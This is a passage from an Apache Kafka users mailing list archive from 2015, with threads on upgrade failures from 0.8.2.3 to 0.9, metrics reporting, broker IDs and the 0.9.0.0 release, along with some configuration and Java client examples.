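is just an example.)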

Thanks,

Jun

On Sun, Dec 27, 2015 at 11:30 PM, Manjunath Shivanna 
wrote:

> Hi,
>
> Correct me if I am wrong. I believe kafka does not replicate the data of a
> lost replica if a broker hosting the replica goes down.
>
> What should be done to make the replication factor reach the desired
> level if the broker hosting the replica cannot be brought back?
>
> Regards,
> Manju
>


Re: Fallout from upgrading to kafka 0.9 from 0.8.2.3

2015-12-17 Thread Jun Rao
Rajiv,

Thanks for reporting this.

1. How did you verify that 3 of the topics are corrupted? Did you use
DumpLogSegments tool? Also, is there a simple way to reproduce the
corruption?
2. As Lance mentioned, if you are using snappy, make sure that you include
the right snappy jar (1.1.1.7).
3. For the CPU issue, could you do a bit profiling to see which thread is
busy and where it's spending time?

Jun


On Tue, Dec 15, 2015 at 12:52 PM, Rajiv Kurian  wrote:

> We had to revert to 0.8.3 because three of our topics seem to have gotten
> corrupted during the upgrade. As soon as we did the upgrade producers to
> the three topics I mentioned stopped being able to do writes. The clients
> complained (occasionally) about leader not found exceptions. We restarted
> our clients and brokers but that didn't seem to help. Actually even after
> reverting to 0.8.3 these three topics were broken. To fix it we had to stop
> all clients, delete the topics, create them again and then restart the
> clients.
>
> I realize this is not a lot of info. I couldn't wait to get more debug info
> because the cluster was actually being used. Has any one run into something
> like this? Are there any known issues with old consumers/producers? The
> topics that got busted had clients writing to them using the old Java
> wrapper over the Scala producer.
>
> Here are the steps I took to upgrade.
>
> For each broker:
>
> 1. Stop the broker.
> 2. Restart with the 0.9 broker running with
> inter.broker.protocol.version=0.8.2.X
> 3. Wait for under replicated partitions to go down to 0.
> 4. Go to step 1.
> Once all the brokers were running the 0.9 code with
> inter.broker.protocol.version=0.8.2.X we restarted them one by one with
> inter.broker.protocol.version=0.9.0.0
>
> When reverting I did the following.
>
> For each broker.
>
> 1. Stop the broker.
> 2. Restart with the 0.9 broker running with
> inter.broker.protocol.version=0.8.2.X
> 3. Wait for under replicated partitions to go down to 0.
> 4. Go to step 1.
>
> Once all the brokers were running 0.9 code with
> inter.broker.protocol.version=0.8.2.X  I restarted them one by one with the
> 0.8.2.3 broker code. This however like I mentioned did not fix the three
> broken topics.
>
>
> On Mon, Dec 14, 2015 at 3:13 PM, Rajiv Kurian  wrote:
>
> > Now that it has been a bit longer, the spikes I was seeing are gone but
> > the CPU and network in/out on the three brokers that were showing the
> > spikes are still much higher than before the upgrade. Their CPUs have
> > increased from around 1-2% to 12-20%. The network in on the same brokers
> > has gone up from under 2 Mb/sec to 19-33 Mb/sec. The network out has gone
> > up from under 2 Mb/sec to 29-42 Mb/sec. I don't see a corresponding
> > increase in kafka messages in per second or kafka bytes in per second JMX
> > metrics.
> >
> > Thanks,
> > Rajiv
> >
>


Re: Fallout from upgrading to kafka 0.9 from 0.8.2.3

2015-12-17 Thread Jun Rao
Are you using the new java producer?

Thanks,

Jun

On Thu, Dec 17, 2015 at 9:58 AM, Rajiv Kurian <ra...@signalfx.com> wrote:

> Hi Jun,
> Answers inline:
>
> On Thu, Dec 17, 2015 at 9:41 AM, Jun Rao <j...@confluent.io> wrote:
>
> > Rajiv,
> >
> > Thanks for reporting this.
> >
> > 1. How did you verify that 3 of the topics are corrupted? Did you use
> > DumpLogSegments tool? Also, is there a simple way to reproduce the
> > corruption?
> >
> No I did not. The only reason I had to believe that was that no writers
> could write to the topic. I actually have no idea what the problem was. I saw
> very frequent (much more than usual) messages of the form:
> INFO  [kafka-request-handler-2] [kafka.server.KafkaApis
>   ]: [KafkaApi-6] Close connection due to error handling produce
> request with correlation id 294218 from client id  with ack=0
> and also message of the form:
> INFO  [kafka-network-thread-9092-0] [kafka.network.Processor
>   ]: Closing socket connection to /some ip
> The cluster was actually a critical one so I had no recourse but to revert
> the change (which like noted didn't fix things). I didn't have enough time
> to debug further. The only way I could fix it with my limited Kafka
> knowledge was (after reverting) deleting the topic and recreating it.
> I had updated a low priority cluster before that worked just fine. That
> gave me the confidence to upgrade this higher priority cluster which did
> NOT work out. So the only way for me to try to reproduce it is to try this
> on our larger clusters again. But it is critical that we don't mess up this
> high priority cluster so I am afraid to try again.
>
> > 2. As Lance mentioned, if you are using snappy, make sure that you
> include
> > the right snappy jar (1.1.1.7).
> >
> Wonder why I don't see Lance's email in this thread. Either way we are not
> using compression of any kind on this topic.
>
> > 3. For the CPU issue, could you do a bit profiling to see which thread is
> > busy and where it's spending time?
> >
> Since I had to revert I didn't have the time to profile. Intuitively it
> would seem like the high number of client disconnects/errors and the
> increased network usage probably has something to do with the high CPU
> (total guess). Again our other (lower traffic) cluster that was upgraded
> was totally fine so it doesn't seem like it happens all the time.
>
> >
> > Jun
> >
> >
> > On Tue, Dec 15, 2015 at 12:52 PM, Rajiv Kurian <ra...@signalfx.com>
> wrote:
> >
> > > We had to revert to 0.8.2.3 because three of our topics seem to have
> > > gotten corrupted during the upgrade. As soon as we did the upgrade,
> > > producers to the three topics I mentioned stopped being able to do
> > > writes. The clients complained (occasionally) about leader-not-found
> > > exceptions. We restarted our clients and brokers, but that didn't seem
> > > to help. Actually, even after reverting to 0.8.2.3, these three topics
> > > were still broken. To fix it we had to stop all clients, delete the
> > > topics, create them again, and then restart the clients.
> > >
> > > I realize this is not a lot of info. I couldn't wait to get more debug
> > > info because the cluster was actually being used. Has anyone run into
> > > something like this? Are there any known issues with old
> > > consumers/producers? The topics that got busted had clients writing to
> > > them using the old Java wrapper over the Scala producer.
> > >
> > > Here are the steps I took to upgrade.
> > >
> > > For each broker:
> > >
> > > 1. Stop the broker.
> > > 2. Restart with the 0.9 broker running with
> > > inter.broker.protocol.version=0.8.2.X
> > > 3. Wait for under replicated partitions to go down to 0.
> > > 4. Go to step 1.
> > > Once all the brokers were running the 0.9 code with
> > > inter.broker.protocol.version=0.8.2.X, we restarted them one by one with
> > > inter.broker.protocol.version=0.9.0.0
> > >
> > > When reverting, I did the following.
> > >
> > > For each broker:
> > >
> > > 1. Stop the broker.
> > > 2. Restart with the 0.9 broker running with
> > > inter.broker.protocol.version=0.8.2.X
> > > 3. Wait for under replicated partitions to go down to 0.
> > > 4. Go to step 1.
> > >
> > > Once all the brokers were running 0.9 code with
> > > inter.broker.protocol.version=0.8.2.X  I restarted them one by one with

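The two-phase procedure described in the quoted steps comes down to a single
server.properties line per phase. A sketch of what each broker runs, assuming
the flow above (the 0.8.2 patch version is left as 0.8.2.X, exactly as in the
steps):

# Phase 1: run the 0.9 broker code but keep speaking the old inter-broker
# protocol. Roll this through the cluster one broker at a time, waiting for
# under-replicated partitions to reach 0 after each restart.
inter.broker.protocol.version=0.8.2.X

# Phase 2: once every broker runs the 0.9 code, do a second rolling restart
# with the protocol bumped:
# inter.broker.protocol.version=0.9.0.0

Reverting follows the same pattern in reverse: first roll back to
inter.broker.protocol.version=0.8.2.X, then swap the broker code.
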
Re: Fallout from upgrading to kafka 0.9 from 0.8.2.3

2015-12-17 Thread Jun Rao
Hmm, is there anything special about those 3 topics? Also, the broker log shows
that the producer uses ack=0, which means the producer shouldn't get errors
like leader not found. Could you clarify the ack setting used by the producer?

Thanks,

Jun

On Thu, Dec 17, 2015 at 12:41 PM, Rajiv Kurian <ra...@signalfx.com> wrote:

> The topic which stopped working had clients that were only using the old
> Java producer that is a wrapper over the Scala producer. Again, it seemed to
> work perfectly in another of our realms where we have the same topics, same
> producers/consumers, etc., but with less traffic.
>
> On Thu, Dec 17, 2015 at 12:23 PM, Jun Rao <j...@confluent.io> wrote:
>
> > Are you using the new java producer?
> >
> > Thanks,
> >
> > Jun
> >
> > On Thu, Dec 17, 2015 at 9:58 AM, Rajiv Kurian <ra...@signalfx.com>
> wrote:
> >
> > > Hi Jun,
> > > Answers inline:
> > >
> > > On Thu, Dec 17, 2015 at 9:41 AM, Jun Rao <j...@confluent.io> wrote:
> > >
> > > > Rajiv,
> > > >
> > > > Thanks for reporting this.
> > > >
> > > > 1. How did you verify that 3 of the topics are corrupted? Did you use
> > > > DumpLogSegments tool? Also, is there a simple way to reproduce the
> > > > corruption?
> > > >
> > > No I did not. The only reason I had to believe that was no writers
> could
> > > write to the topic. I have actually no idea what the problem was. I saw
> > > very frequent (much more than usual) messages of the form:
> > > INFO  [kafka-request-handler-2] [kafka.server.KafkaApis
> > >   ]: [KafkaApi-6] Close connection due to error handling produce
> > > request with correlation id 294218 from client id  with ack=0
> > > and also message of the form:
> > > INFO  [kafka-network-thread-9092-0] [kafka.network.Processor
> > >   ]: Closing socket connection to /some ip
> > > The cluster was actually a critical one so I had no recourse but to
> > revert
> > > the change (which like noted didn't fix things). I didn't have enough
> > time
> > > to debug further. The only way I could fix it with my limited Kafka
> > > knowledge was (after reverting) deleting the topic and recreating it.
> > > I had updated a low priority cluster before that worked just fine. That
> > > gave me the confidence to upgrade this higher priority cluster which
> did
> > > NOT work out. So the only way for me to try to reproduce it is to try
> > this
> > > on our larger clusters again. But it is critical that we don't mess up
> > this
> > > high priority cluster so I am afraid to try again.
> > >
> > > > 2. As Lance mentioned, if you are using snappy, make sure that you
> > > include
> > > > the right snappy jar (1.1.1.7).
> > > >
> > > Wonder why I don't see Lance's email in this thread. Either way we are
> > not
> > > using compression of any kind on this topic.
> > >
> > > > 3. For the CPU issue, could you do a bit profiling to see which
> thread
> > is
> > > > busy and where it's spending time?
> > > >
> > > Since I had to revert I didn't have the time to profile. Intuitively it
> > > would seem like the high number of client disconnects/errors and the
> > > increased network usage probably has something to do with the high CPU
> > > (total guess). Again our other (lower traffic) cluster that was
> upgraded
> > > was totally fine so it doesn't seem like it happens all the time.
> > >
> > > >
> > > > Jun
> > > >
> > > >
> > > > On Tue, Dec 15, 2015 at 12:52 PM, Rajiv Kurian <ra...@signalfx.com>
> > > wrote:
> > > >
> > > > > We had to revert to 0.8.2.3 because three of our topics seem to have
> > > gotten
> > > > > corrupted during the upgrade. As soon as we did the upgrade
> producers
> > > to
> > > > > the three topics I mentioned stopped being able to do writes. The
> > > clients
> > > > > complained (occasionally) about leader not found exceptions. We
> > > restarted
> > > > > our clients and brokers but that didn't seem to help. Actually even
> > > after
> > > > > reverting to 0.8.2.3 these three topics were broken. To fix it we had
> > to
> > > > stop
> > > > > all clients, delete the topics, create them again and then restart
> > the
> > > >

Re: Fallout from upgrading to kafka 0.9 from 0.8.2.3

2015-12-17 Thread Jun Rao
Yes, the new java producer is available in 0.8.2.x and we recommend that people
use it.

Also, when those producers had the issue, was anything else weird going on
in the broker (e.g., the broker's ZK session expiring)?

Thanks,

Jun

On Thu, Dec 17, 2015 at 2:37 PM, Rajiv Kurian <ra...@signalfx.com> wrote:

> I can't think of anything special about the topics besides the clients
> being very old (Java wrappers over Scala).
>
> I do think it was using ack=0. But my guess is that the logging was done by
> the Kafka producer thread. My application itself was not getting exceptions
> from Kafka.
>
> On Thu, Dec 17, 2015 at 2:31 PM, Jun Rao <j...@confluent.io> wrote:
>
> > Hmm, anything special with those 3 topics? Also, the broker log shows
> that
> > the producer uses ack=0, which means the producer shouldn't get errors
> like
> > leader not found. Could you clarify on the ack used by the producer?
> >
> > Thanks,
> >
> > Jun
> >
> > On Thu, Dec 17, 2015 at 12:41 PM, Rajiv Kurian <ra...@signalfx.com>
> wrote:
> >
> > > The topic which stopped working had clients that were only using the
> old
> > > Java producer that is a wrapper over the Scala producer. Again it
> seemed
> > to
> > > work perfectly in another of our realms where we have the same topics,
> > same
> > > producers/consumers etc but with less traffic.
> > >
> > > On Thu, Dec 17, 2015 at 12:23 PM, Jun Rao <j...@confluent.io> wrote:
> > >
> > > > Are you using the new java producer?
> > > >
> > > > Thanks,
> > > >
> > > > Jun
> > > >
> > > > On Thu, Dec 17, 2015 at 9:58 AM, Rajiv Kurian <ra...@signalfx.com>
> > > wrote:
> > > >
> > > > > Hi Jun,
> > > > > Answers inline:
> > > > >
> > > > > On Thu, Dec 17, 2015 at 9:41 AM, Jun Rao <j...@confluent.io> wrote:
> > > > >
> > > > > > Rajiv,
> > > > > >
> > > > > > Thanks for reporting this.
> > > > > >
> > > > > > 1. How did you verify that 3 of the topics are corrupted? Did you
> > use
> > > > > > DumpLogSegments tool? Also, is there a simple way to reproduce
> the
> > > > > > corruption?
> > > > > >
> > > > > No I did not. The only reason I had to believe that was no writers
> > > could
> > > > > write to the topic. I have actually no idea what the problem was. I
> > saw
> > > > > very frequent (much more than usual) messages of the form:
> > > > > INFO  [kafka-request-handler-2] [kafka.server.KafkaApis
> > > > >   ]: [KafkaApi-6] Close connection due to error handling
> produce
> > > > > request with correlation id 294218 from client id  with ack=0
> > > > > and also message of the form:
> > > > > INFO  [kafka-network-thread-9092-0]
> [kafka.network.Processor
> > > > >   ]: Closing socket connection to /some ip
> > > > > The cluster was actually a critical one so I had no recourse but to
> > > > revert
> > > > > the change (which like noted didn't fix things). I didn't have
> enough
> > > > time
> > > > > to debug further. The only way I could fix it with my limited Kafka
> > > > > knowledge was (after reverting) deleting the topic and recreating
> it.
> > > > > I had updated a low priority cluster before that worked just fine.
> > That
> > > > > gave me the confidence to upgrade this higher priority cluster
> which
> > > did
> > > > > NOT work out. So the only way for me to try to reproduce it is to
> try
> > > > this
> > > > > on our larger clusters again. But it is critical that we don't mess
> > up
> > > > this
> > > > > high priority cluster so I am afraid to try again.
> > > > >
> > > > > > 2. As Lance mentioned, if you are using snappy, make sure that
> you
> > > > > include
> > > > > > the right snappy jar (1.1.1.7).
> > > > > >
> > > > > Wonder why I don't see Lance's email in this thread. Either way we
> > are
> > > > not
> > > > > using compression of any kind on this topic.
> > > > >
> > > > > > 3. For the CPU issue, could you do a bit profiling to see which
> > > thread
> > >
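
A note on why the ack setting matters here: with ack=0 the producer does not
wait for any broker response, so failures surface only as broker-side log
lines like the "Close connection" messages above, never as client exceptions.
Below is a minimal sketch of the new java producer configured so that send
failures are reported back to the application (the broker address and topic
name are placeholders; this illustrates the acks setting, not a fix for the
broken topics):

import java.util.Properties;
import org.apache.kafka.clients.producer.Callback;
import org.apache.kafka.clients.producer.KafkaProducer;
import org.apache.kafka.clients.producer.ProducerRecord;
import org.apache.kafka.clients.producer.RecordMetadata;

public class AckedProducerExample {
    public static void main(String[] args) {
        Properties props = new Properties();
        props.put("bootstrap.servers", "broker-host:9092"); // placeholder
        // Wait for the leader's acknowledgement so errors are reported back.
        props.put("acks", "1");
        props.put("key.serializer",
                "org.apache.kafka.common.serialization.StringSerializer");
        props.put("value.serializer",
                "org.apache.kafka.common.serialization.StringSerializer");

        KafkaProducer<String, String> producer = new KafkaProducer<>(props);
        producer.send(new ProducerRecord<String, String>("some-topic", "key", "value"),
                new Callback() {
                    public void onCompletion(RecordMetadata metadata, Exception e) {
                        // With ack=0 this callback would never see errors such
                        // as leader-not-found; with acks=1 they show up here.
                        if (e != null) {
                            e.printStackTrace();
                        }
                    }
                });
        producer.close();
    }
}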

Re: CSVMetricsReporter name conflict

2015-12-14 Thread Jun Rao
Andrew,

Yes, in 0.8.2.x, we cleaned up the metric names to put meaningful attributes in
tags instead of in the name. This makes it easier for monitoring
applications to parse those metric names. It seems that we need a
CSVMetricsReporter that can deal with tagged names better. Many people also
use jmxtrans to export the Kafka metrics.

Thanks,

Jun

On Mon, Dec 14, 2015 at 10:32 AM, Andrew Grasso 
wrote:

> Hello,
>
> I've been trying to monitor a Kafka broker using the CSVMetricsReporter.
> However, when I start the broker, only a few csv files are created in the
> directory, and then there are repeated IOExceptions in the kafka.out log
> stating that CsvReporter.createStreamForMetric cannot create the file
> {path_to_metrics_dir}/LocalTimeMs.csv
>
> I can recreate this problem in 0.8.2.1, 0.8.2.2, and 0.9.0.0. CSV reporting
> works as expected in 0.8.1.1.
>
> I believe the problem is that in the later versions CSV files are being
> named from only the metric name, and not the tags. In 0.8.1.1, the
> LocalTimeMs metrics are given a name prefixed with a distinguishing source,
> while in later versions this information is passed as a tag. These tags are
> passed into the MetricName constructor in
> KafkaMetricsGroup.explicitMetricName, but as the mBeanName and not as the
> name.
>
> This is causing a name conflict, since CSV files are named from the name
> field, not the mBeanName.
>
> For a similar reason, I cannot get metrics on partition-specific data. The
> CSV reporter seems not to try any other metrics after raising an exception
> on LocalTimeMs. All metrics are published correctly to JMX.
>
> Has anyone encountered this problem? Is there a way to make CSV metrics
> work in the stable release (0.8.2.2)?
>
> It is possible I have missed something in following the code, as I am not
> very literate in Scala, but I am reasonably confident that my understanding
> of the code lines up with the behavior I've seen.
>
> I believe this behavior is related to an old issue, KAFKA-542
> 
>
> Best,
> Andrew Grasso
>
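
For context, the CSV reporter under discussion is enabled through broker
configuration. A sketch of the relevant server.properties entries follows (the
output directory is a placeholder); note that on the affected versions,
metrics that differ only in their tags will still collide on file names, as
described above:

# Enable the yammer-metrics CSV reporter built into the broker.
kafka.metrics.reporters=kafka.metrics.KafkaCSVMetricsReporter
kafka.csv.metrics.reporter.enabled=true
# Placeholder output directory for the per-metric CSV files.
kafka.csv.metrics.dir=/tmp/kafka_metrics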


Re: 0.9.0.0 release notes is opening download mirrors page

2015-11-30 Thread Jun Rao
Kris,

It just points to the mirror site. If you click on one of the links, you
will see the release notes.

Thanks,

Jun

On Mon, Nov 30, 2015 at 1:37 PM, Kris K  wrote:

> Hi,
>
> Just noticed that the Release notes link of 0.9.0.0 is pointing to the
> download mirrors page.
>
>
> https://www.apache.org/dyn/closer.cgi?path=/kafka/0.9.0.0/RELEASE_NOTES.html
>
>
> Thanks,
> Kris K
>


Re: 0.9.0.0[error]

2015-11-25 Thread Jun Rao
Fredo,

Thanks for reporting this. Are you starting a brand new 0.9.0.0 cluster?
Are there steps that one can follow to reproduce this issue easily?

Jun

On Tue, Nov 24, 2015 at 10:52 PM, Fredo Lee  wrote:

> The content below is the error report from Kafka.
>
> When I try to fetch the coordinator broker, I get error code 6 forever.
>
>
>
> [2015-11-25 14:48:28,638] ERROR [KafkaApi-1] error when handling request
> Name: FetchRequest; Version: 1; CorrelationId: 643; ClientId:
> ReplicaFetcherThread-0-4; ReplicaId: 1; MaxWait: 500 ms; MinBytes: 1 bytes;
> RequestInfo: [__consumer_offsets,49] -> PartitionFetchInfo(0,1048576),
> [__consumer_offsets,17] -> PartitionFetchInfo(0,1048576),
> [__consumer_offsets,29] -> PartitionFetchInfo(0,1048576),
> [blcs,6] -> PartitionFetchInfo(0,1048576),
> [__consumer_offsets,41] -> PartitionFetchInfo(0,1048576),
> [__consumer_offsets,13] -> PartitionFetchInfo(0,1048576),
> [__consumer_offsets,5] -> PartitionFetchInfo(0,1048576),
> [__consumer_offsets,37] -> PartitionFetchInfo(0,1048576),
> [__consumer_offsets,25] -> PartitionFetchInfo(0,1048576),
> [__consumer_offsets,1] -> PartitionFetchInfo(0,1048576) (kafka.server.KafkaApis)
> kafka.common.KafkaException: Should not set log end offset on partition
> [__consumer_offsets,49]'s local replica 1
> at kafka.cluster.Replica.logEndOffset_$eq(Replica.scala:66)
> at kafka.cluster.Replica.updateLogReadResult(Replica.scala:53)
> at
> kafka.cluster.Partition.updateReplicaLogReadResult(Partition.scala:240)
> at
>
> kafka.server.ReplicaManager$$anonfun$updateFollowerLogReadResults$2.apply(ReplicaManager.scala:852)
> at
>
> kafka.server.ReplicaManager$$anonfun$updateFollowerLogReadResults$2.apply(ReplicaManager.scala:849)
> at
> scala.collection.immutable.HashMap$HashMap1.foreach(HashMap.scala:221)
> at
> scala.collection.immutable.HashMap$HashTrieMap.foreach(HashMap.scala:428)
> at
>
> kafka.server.ReplicaManager.updateFollowerLogReadResults(ReplicaManager.scala:849)
> at
> kafka.server.ReplicaManager.fetchMessages(ReplicaManager.scala:467)
> at kafka.server.KafkaApis.handleFetchRequest(KafkaApis.scala:434)
> at kafka.server.KafkaApis.handle(KafkaApis.scala:69)
> at
> kafka.server.KafkaRequestHandler.run(KafkaRequestHandler.scala:60)
> at java.lang.Thread.run(Thread.java:722)
>


Re: upgrade to 0.9 and auto generated broker id

2015-11-25 Thread Jun Rao
broker.id is the identifier of the broker. If you have existing data, you
should preserve the broker.id. If you restart the broker with a new id, all
replicas stored with the old broker id are considered gone.

Thanks,

Jun

On Wed, Nov 25, 2015 at 7:20 AM, Evgeniy Shishkin 
wrote:

> Hello,
>
> I have a question regarding the upgrade to 0.9.
>
> Is it recommended to keep broker.id in the config after the upgrade?
> Will there be any data loss or stuck replication if we remove broker.id
> and restart the broker?
>
> Thanks.
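
A sketch of the configuration implied by this answer: pin the broker's
existing id explicitly rather than relying on 0.9's id auto-generation (the
id value below is only an example; the commented lines show the 0.9 defaults
that govern auto-generation):

# Keep the id this broker had before the upgrade; replicas are tracked by
# broker id, so restarting under a new id makes the old replicas appear gone.
broker.id=5
# 0.9 auto-generates an id (above reserved.broker.max.id) only when none is set:
# broker.id.generation.enable=true
# reserved.broker.max.id=1000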


Re: 0.9.0.0[error]

2015-11-25 Thread Jun Rao
Are you running any non-java client, especially a consumer?

Thanks,

Jun

On Wed, Nov 25, 2015 at 6:38 PM, Fredo Lee <buaatianwa...@gmail.com> wrote:

> This is my config file; it is the original file with some changes made by me.
>
> broker.id=1
> listeners=PLAINTEXT://:9092
> num.partitions=10
> log.dirs=/tmp/kafka-logs1
> zookeeper.connect=localhost:2181
> zookeeper.connection.timeout.ms=2000
> delete.topic.enable=true
> default.replication.factor=2
> auto.leader.rebalance.enable=true
>
>
> If I change listeners to 9093, it works. There is no process running on
> this port!!
> I don't know why.
>
>
> 2015-11-25 23:58 GMT+08:00 Jun Rao <j...@confluent.io>:
>
> > Fredo,
> >
> > Thanks for reporting this. Are you starting a brand new 0.9.0.0 cluster?
> > Are there steps that one can follow to reproduce this issue easily?
> >
> > Jun
> >
> > On Tue, Nov 24, 2015 at 10:52 PM, Fredo Lee <buaatianwa...@gmail.com>
> > wrote:
> >
> > > The content below is the error report from Kafka.
> > >
> > > When I try to fetch the coordinator broker, I get error code 6 forever.
> > >
> > >
> > >
> > > [2015-11-25 14:48:28,638] ERROR [KafkaApi-1] error when handling request
> > > Name: FetchRequest; Version: 1; CorrelationId: 643; ClientId:
> > > ReplicaFetcherThread-0-4; ReplicaId: 1; MaxWait: 500 ms; MinBytes: 1 bytes;
> > > RequestInfo: [__consumer_offsets,49] -> PartitionFetchInfo(0,1048576),
> > > [__consumer_offsets,17] -> PartitionFetchInfo(0,1048576),
> > > [__consumer_offsets,29] -> PartitionFetchInfo(0,1048576),
> > > [blcs,6] -> PartitionFetchInfo(0,1048576),
> > > [__consumer_offsets,41] -> PartitionFetchInfo(0,1048576),
> > > [__consumer_offsets,13] -> PartitionFetchInfo(0,1048576),
> > > [__consumer_offsets,5] -> PartitionFetchInfo(0,1048576),
> > > [__consumer_offsets,37] -> PartitionFetchInfo(0,1048576),
> > > [__consumer_offsets,25] -> PartitionFetchInfo(0,1048576),
> > > [__consumer_offsets,1] -> PartitionFetchInfo(0,1048576) (kafka.server.KafkaApis)
> > > kafka.common.KafkaException: Should not set log end offset on partition
> > > [__consumer_offsets,49]'s local replica 1
> > > at kafka.cluster.Replica.logEndOffset_$eq(Replica.scala:66)
> > > at kafka.cluster.Replica.updateLogReadResult(Replica.scala:53)
> > > at
> > > kafka.cluster.Partition.updateReplicaLogReadResult(Partition.scala:240)
> > > at
> > >
> > >
> >
> kafka.server.ReplicaManager$$anonfun$updateFollowerLogReadResults$2.apply(ReplicaManager.scala:852)
> > > at
> > >
> > >
> >
> kafka.server.ReplicaManager$$anonfun$updateFollowerLogReadResults$2.apply(ReplicaManager.scala:849)
> > > at
> > > scala.collection.immutable.HashMap$HashMap1.foreach(HashMap.scala:221)
> > > at
> > >
> scala.collection.immutable.HashMap$HashTrieMap.foreach(HashMap.scala:428)
> > > at
> > >
> > >
> >
> kafka.server.ReplicaManager.updateFollowerLogReadResults(ReplicaManager.scala:849)
> > > at
> > > kafka.server.ReplicaManager.fetchMessages(ReplicaManager.scala:467)
> > > at
> kafka.server.KafkaApis.handleFetchRequest(KafkaApis.scala:434)
> > > at kafka.server.KafkaApis.handle(KafkaApis.scala:69)
> > > at
> > > kafka.server.KafkaRequestHandler.run(KafkaRequestHandler.scala:60)
> > > at java.lang.Thread.run(Thread.java:722)
> > >
> >
>
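
One observation, offered as a guess rather than a diagnosis: the error above
shows broker 1 ([KafkaApi-1]) receiving a replica fetch that also claims
ReplicaId 1, which is consistent with two broker processes ending up with the
same broker.id (or a stale registration in ZooKeeper). When running several
brokers on one host, every per-broker value must be unique; a sketch of a
second broker's config alongside the one posted above:

# Second broker on the same host: id, listener port, and log dir must all
# differ per broker, while zookeeper.connect stays the same.
broker.id=2
listeners=PLAINTEXT://:9093
log.dirs=/tmp/kafka-logs2
zookeeper.connect=localhost:2181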


[ANNOUNCE] Apache Kafka 0.9.0.0 Released

2015-11-24 Thread Jun Rao
The Apache Kafka community is pleased to announce the release of
Apache Kafka 0.9.0.0. This is a major release that includes (1)
authentication (through SSL and SASL) and authorization, (2) a new
java consumer, (3) a Kafka connect framework for data ingestion and
egression, and (4) quotas. It also includes many critical bug fixes.

All of the changes in this release can be found at:
https://www.apache.org/dyn/closer.cgi?path=/kafka/0.9.0.0/RELEASE_NOTES.html

Apache Kafka is a high-throughput, publish-subscribe messaging system
rethought as a distributed commit log.

** Fast => A single Kafka broker can handle hundreds of megabytes of reads and
writes per second from thousands of clients.

** Scalable => Kafka is designed to allow a single cluster to serve as the
central data backbone for a large organization. It can be elastically and
transparently expanded without downtime. Data streams are partitioned and
spread over a cluster of machines to allow data streams larger than the
capability of any single machine and to allow clusters of co-ordinated
consumers.

** Durable => Messages are persisted on disk and replicated within the
cluster to prevent data loss. Each broker can handle terabytes of messages
without performance impact.

** Distributed by Design => Kafka has a modern cluster-centric design that
offers strong durability and fault-tolerance guarantees.

You can download the source release from
https://www.apache.org/dyn/closer.cgi?path=/kafka/0.9.0.0/kafka-0.9.0.0-src.tgz

and binary releases from
https://www.apache.org/dyn/closer.cgi?path=/kafka/0.9.0.0/kafka_2.10-0.9.0.0.tgz
https://www.apache.org/dyn/closer.cgi?path=/kafka/0.9.0.0/kafka_2.11-0.9.0.0.tgz

A big thank you to the following people who have contributed to the
0.9.0.0 release.

Aditya Auradkar, Alexander Pakulov, Alexey Ozeritskiy, Alexis Midon,
Allen Wang, Anatoly Fayngelerin, Andrew Otto, Andrii Biletskyi, Anna
Povzner, Anton Karamanov, Ashish Singh, Balaji Seshadri, Ben Stopford,
Chris Black, Chris Cope, Chris Pinola, Daniel Compton, Dave Beech,
Dave Cromberge, Dave Parfitt, David Jacot, Dmytro Kostiuchenko, Dong
Lin, Edward Ribeiro, Eno Thereska, Eric Olander, Ewen
Cheslack-Postava, Fangmin Lv, Flavio Junqueira, Flutra Osmani, Gabriel
Nicolas Avellaneda, Geoff Anderson, Grant Henke, Guozhang Wang, Gwen
Shapira, Honghai Chen, Ismael Juma, Ivan Lyutov, Ivan Simoneko,
Jaikiran Pai, James Oliver, Jarek Jarcec Cecho, Jason Gustafson, Jay
Kreps, Jean-Francois Im, Jeff Holoman, Jeff Maxwell, Jiangjie Qin, Joe
Crobak, Joe Stein, Joel Koshy, Jon Riehl, Joshi, Jun Rao, Kostya
Golikov, Liquan Pei, Magnus Reftel, Manikumar Reddy, Marc Chung,
Martin Lemanski, Matthew Bruce, Mayuresh Gharat, Michael G. Noll,
Muneyuki Noguchi, Neha Narkhede, Onur Karaman, Parth Brahmbhatt, Paul
Mackles, Pierre-Yves Ritschard, Proneet Verma, Rajini Sivaram, Raman
Gupta, Randall Hauch, Sasaki Toru, Sriharsha Chintalapani, Steven Wu,
Stevo Slavic, Tao Xiao, Ted Malaska, Tim Brooks, Todd Palino, Tong Li,
Vivek Madani, Vladimir Tretyakov, Yaguo Zhou, Yasuhiro Matsuda,
Zhiqiang He 

We welcome your help and feedback. For more information on how to
report problems, and to get involved, visit the project website at 
http://kafka.apache.org/

Thanks,

Jun
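
For readers who want to try the new java consumer highlighted above, here is
a minimal sketch against a 0.9 cluster (the broker address, group id, and
topic name are placeholders):

import java.util.Arrays;
import java.util.Properties;
import org.apache.kafka.clients.consumer.ConsumerRecord;
import org.apache.kafka.clients.consumer.ConsumerRecords;
import org.apache.kafka.clients.consumer.KafkaConsumer;

public class NewConsumerExample {
    public static void main(String[] args) {
        Properties props = new Properties();
        props.put("bootstrap.servers", "broker-host:9092"); // placeholder
        props.put("group.id", "example-group");             // placeholder
        props.put("key.deserializer",
                "org.apache.kafka.common.serialization.StringDeserializer");
        props.put("value.deserializer",
                "org.apache.kafka.common.serialization.StringDeserializer");

        KafkaConsumer<String, String> consumer = new KafkaConsumer<>(props);
        consumer.subscribe(Arrays.asList("some-topic"));
        try {
            while (true) {
                // The 0.9 API takes a poll timeout in milliseconds.
                ConsumerRecords<String, String> records = consumer.poll(100);
                for (ConsumerRecord<String, String> record : records) {
                    System.out.printf("offset=%d key=%s value=%s%n",
                            record.offset(), record.key(), record.value());
                }
            }
        } finally {
            consumer.close();
        }
    }
}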


Re: 0.9.0.0 RC4

2015-11-23 Thread Jun Rao
+1

Thanks,

Jun

On Fri, Nov 20, 2015 at 5:21 PM, Jun Rao <j...@confluent.io> wrote:

> This is the fourth candidate for release of Apache Kafka 0.9.0.0. This is a
> major release that includes (1) authentication (through SSL and SASL) and
> authorization, (2) a new java consumer, (3) a Kafka connect framework for
> data ingestion and egression, and (4) quotas. Since this is a major
> release, we will give people a bit more time to try this out.
>
> Release Notes for the 0.9.0.0 release
>
> https://people.apache.org/~junrao/kafka-0.9.0.0-candidate4/RELEASE_NOTES.html
>
> *** Please download, test and vote by Monday, Nov. 23, 6pm PT
>
> Kafka's KEYS file, containing the PGP keys we use to sign the release:
> http://kafka.apache.org/KEYS. In addition, md5, sha1,
> and sha2 (SHA256) checksums are provided.
>
> * Release artifacts to be voted upon (source and binary):
> https://people.apache.org/~junrao/kafka-0.9.0.0-candidate4/
>
> * Maven artifacts to be voted upon prior to release:
